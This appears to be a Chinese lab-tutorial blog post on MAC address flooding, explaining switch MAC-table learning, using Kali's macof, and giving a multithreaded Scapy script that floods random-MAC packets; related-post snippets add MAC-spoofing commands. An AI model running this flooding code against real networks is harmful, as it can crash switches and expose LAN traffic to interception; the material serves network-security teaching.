kali与Python实施MAC地址泛洪攻击

最新推荐文章于 2025-02-27 21:44:19 发布
最新推荐文章于 2025-02-27 21:44:19 发布
阅读量1.3k 收藏 20
点赞数 14
分类专栏: Python攻击脚本开发 网络安全 文章标签: python 网络攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/141562158
版权

文章目录

  • ==MAC地址泛洪攻击==
    • 一、交换机的工作过程
    • 二、基本的攻击原理
    • 三、攻击方式
      • 1、kali工具 - macof
      • 2、python代码
    • 四、虚拟机的混杂模式

MAC地址泛洪攻击

一、交换机的工作过程

image-20240513225016769

image-20240513225036349

空初始交换机

当电脑与交换机连上之后

image-20240514131914203

show mac address-table 我们可以看到

image-20240514132019164

该表中的mac地址和端口号就形成了一一对应的关系

再插一台主机在switcher上

image-20240514132447544

image-20240514132454065

当一个主机上线,交换机与主机之间就可以自主通过协议形成该交换表

二、基本的攻击原理

1、定义任意数据包,并生成随机的MAC地址,不停的发送该数据包

2、该条数据包会流向交换机,而此时的交换机会发现该数据包的源MAC地址不在自己的MAC表中,于是交换机自主学习添加该MAC以及他对应的端口

3、如果发送的构造的数据包数量很大,则会填满MAC表,导致新的数据包无法添加到MAC表中,此时,理论上来说,交换机就会对接下来无法添加进MAC表中的数据包进行广播。

4、一旦交换机进行数据广播,则会导致整个局域网的数据流量全部成员都可见

5、MAC地址泛洪也存在其他情况,比如交换机崩溃,或者整个局域网无法上网等情况。

MAC地址:00:0c:29:ba:c7:bd 一共是16的12次方个,也就是2的48次方个 ,281,474,976,710,656 281万亿种组合

三、攻击方式

1、kali工具 - macof

直接 macof 运行即可,效果有点孩怕,不敢随便使用,害怕给真的交换机搞坏了就完蛋了

image-20240514210630730

在这里插入图片描述

2、python代码

def MAC_Flood():
    while True:
        randommac = RandMAC('*:*:*:*:*:*')  # 随机MAC,虽然这里只生成了一个随机MAC,但是用在下面的数据包构造时,源MAC和目的MAC是不一样的,自动调用了两次
        # randomip = RandIP('*.*.*.*')  # 随机IP,但是好像RandIP用不了
        # print(f'randommac : {randommac}')
        # print(randomip)

        srandip = f'{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}'
        drandip = f'{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}'
        # print(f'srandip : {srandip}')
        # print(f'drandip : {drandip}')
        pkg = Ether(src=randommac,dst=randommac)/IP(src=srandip,dst=drandip)
        sendp(pkg,iface='VMware Network Adapter VMnet8',loop=0)
        # loop=0 表示只发送一次数据包,不循环发送
        
if __name__ == '__main__':
    for i in range(400):
        t = threading.Thread(target=MAC_Flood)

        t.start()

四、虚拟机的混杂模式

当物理机ping其中一台虚拟机时,另外一台虚拟机是可以直接监听到这个ping的过程的,我在想是不是因为是一个局域网的原因

默认情况下,VMware使用混杂模式,整个网络通信过程类似于广播,任意网段内的流量,均会被其他主机监听

下图是在Kali上检测到物理机ping另外一台虚拟机

image-20240514204312442

下图是在Kali上检测到另外一台虚拟机访问woniuxy

image-20240514204506887

如何禁用混杂模式

修改虚拟机目录下的 .vmx 文件,最后一行添加 ethernet0.noPromisc = "TRUE" 表示禁用该虚拟机的混杂模式

详解ARP攻击原理、类型、机制、欺骗主机、仿冒网关、泛洪攻击,以及网络攻击中如何快速判断客户端是否存在恶意连接?
代码讲故事
03-27 509
详解ARP攻击原理、类型、机制、欺骗主机、仿冒网关、泛洪攻击,以及网络攻击中如何快速判断客户端是否存在恶意连接?ARP攻击(Address Resolution Protocol attack)是一种网络攻击技术,它利用了ARP协议的设计缺陷来实施攻击。ARP是网络协议中用于将网络层的IP地址解析为链路层的MAC地址的协议。在局域网中,当一个设备想要另一个设备通信时,它需要知道对方的MAC地址,这就是ARP协议的作用。
[网络安全自学篇] 七十七.恶意代码APT攻击中的武器
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
mac地址泛洪攻击详解
10-21
详解mac地址泛洪攻击。。。。 对大家深入理解交换网络安全有很大帮助
MAC地址泛洪攻击
2303_80370981的博客
01-09 1017
对于使用mac地址泛洪,使用虚拟机kali来抓取计算机传输之间的信息
MAC地址泛洪攻击及防护措施实操
最新发布
w2361734601的博客
02-27 470
MAC地址泛洪攻击是一种常见的网络攻击手段,通过合理的配置和防护措施,可以有效防止此类攻击对网络的影响。希望本文的实操部分能为你提供有价值的参考,帮助你更好地保护网络的安全。
MAC地址泛洪攻击
辉小鱼的博客
11-17 1183
MAC地址泛洪攻击MAC地址泛洪攻击MAC地址表泛洪原理简介​MAC(Media Access Control,介质访问控制)地址是识别LAN节点的标识,是传输数据时真正赖以标识发出数据的电脑和接收数据的主机地址。交换机可以识别连在网络上的节点的网卡MAC地址,并把他们放到一个叫做MAC地址表的地方。这个MAC地址表存放于交换机的缓存中,并记住这些地址。​。
Kali Linux利用macofPython攻击交换机详解
攻击者可以编写python脚本,自动发送大量带有随机MAC地址的数据包,达到macof相同的效果。脚本编写涉及网络编程,通过发送特定协议的报文,实现对交换机的攻击。成功执行后,同样会造成MAC地址表混乱,影响网络...
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
热门推荐
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
最新kali之nmap
vanony的博客
01-22 1227
描述:   网络探索工具和安全性/端口扫描程序。   Nmap(“网络映射器”)是用于网络探索和安全审核的开源工具。 它旨在快速扫描大型网络,尽管它可以对单个主机正常运行。 Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务(应用程序名称和版本),它们正在运行的操作系统(和OS版本),包过滤器/防火墙的类型。 正在使用中,还有许多其他特性。 尽管Nmap通常用于安全审核,但许多系统和网络管理员发现它对于日常任务(例如网络清单,管理服务升级计划以及监视主机或服务正常运行时间)很有
MAC泛洪攻击及解决方法
m0_61469678的博客
04-04 9916
MAC地址泛洪攻击:是攻击者利用了交换机自学习的原理,通过一定手段可以在几秒内生成几十万不同的MAC地址,并发送给交换机,这台交换机的MAC地址表很快就被这些伪造的MAC地址占满。当交换机的MAC地址表存储达到上限后,再收到数据帧时,一看该目标MAC地址,不在交换机的MAC地址表中,就会通过交换机的原理,进行泛洪,这样攻击者就会捕获这些数据帧。
mac-泛洪
m0_73255659的博客
11-05 1258
在静态 MAC 转发表中,交换机只知道那些手动配置的 MAC 地址,因此不会因为接收到未知的 MAC 地址而发送广播。数据链路层的限制:在数据链路层,MAC地址是局域网内使用的。即使你通过路由器连接到另一个局域网,你的MAC帧依然是基于你的本地网络环境发送的,不会影响目标局域网的交换机。等工具进行 MAC 泛洪攻击仍然可以导致 AP 的 MAC 地址表溢出,从而使得流量被广播到所有连接的设备。:由于交换机只处理已知的静态 MAC 地址,任何未知地址的流量不会引发广播,从而减少了广播风暴的可能性。
交换机安全 --- Mac地址泛洪攻击
Chen的代码世界
08-04 1010
交换机原理: 数据来到交换机后,交换机先查看数据中的源MAC地址,将源MAC地址和进入接口的信息记录在MAC地址表中。如果目标MAC地址存在于MAC地址表中,那么就进行单播,否则就会泛洪。 泛洪:除开数据进入的接口外,将数据转发到其他所有接口。 泛洪范围:单个交换机时,交换机的所有接口处于同一个泛洪范围;多台交换机级联的时候,所有交换机处于同一个泛洪范围。 在MAC地址表中,一个接口可以对应多个MAC地址;一个MAC地址只能对应一个接口 为了保证MAC地址表的更新性,MAC地址表有老化时间 — —.
Kali渗透-Mac泛洪攻击监听
道阻且长,行则将至
03-02 9449
前言 严正声明:本文仅限于技术讨论分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的交换机压力测试工具 macof 在局域网内对交换机进行 Mac 泛洪攻击,实现在 Kali 中使用 tcpdump、WireShark 工具进一步对 Centos 7 Win 7 之间的 FTP 通信(未加密的通信)的流量监听并获取账户密码的攻击目的。 环境说明 主机...
MAC泛洪攻击
qq_43659378的博客
11-08 1272
数据链路层攻击MAC泛洪攻击 什么是MAC泛洪攻击? 交换机中存在着一张记录着MAC地址的表,为了完成数据的快速转发,该表具有自动学习机制;泛洪攻击即是攻击者利用这种学习机制不断发送不同的MAC地址给交换机,充满整个MAC表,此时交换机只能进行数据广播,攻击者凭此获得信息。 MAC泛洪攻击原理 利用了交换机的学习机制,交换机的表项数目有限,交换机的转发机制。 实验环境:一台KALI虚拟机,ensp配置拓扑图 ENSP拓扑图 查看交换机的CAM表 进入虚拟机开始攻击 攻击之后交换机的CAM表 此时启动
kali mac地址伪造
01-08
### 实现MAC地址欺骗或更改MAC地址Kali Linux 中,可以通过简单的命令序列来实现 MAC 地址的伪造。对于大多数无线网络接口以及部分有线网络接口而言,动态修改 MAC 地址是一个可行的操作。 为了将 `wlan0` 接口的 MAC 地址更改为 `00:11:22:33:44:55`,可以按照如下方法操作: ```bash ifconfig wlan0 down ifconfig wlan0 hw ether 00:11:22:33:44:55 ifconfig wlan0 up ``` 上述命令首先关闭指定的网络接口,接着改变其硬件(物理层)地址至新的 MAC 地址,最后重新激活该接口[^1]。 值得注意的是,在现代版本的 Linux 发行版中,推荐使用 `ip link set` 命令代替过时的 `ifconfig` 工具来进行此类配置: ```bash ip link set dev wlan0 down ip link set dev wlan0 address 00:11:22:33:44:55 ip link set dev wlan0 up ``` 这种方法同样能够有效地完成 MAC 地址的变更工作,并且更加符合当前的最佳实践标准。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值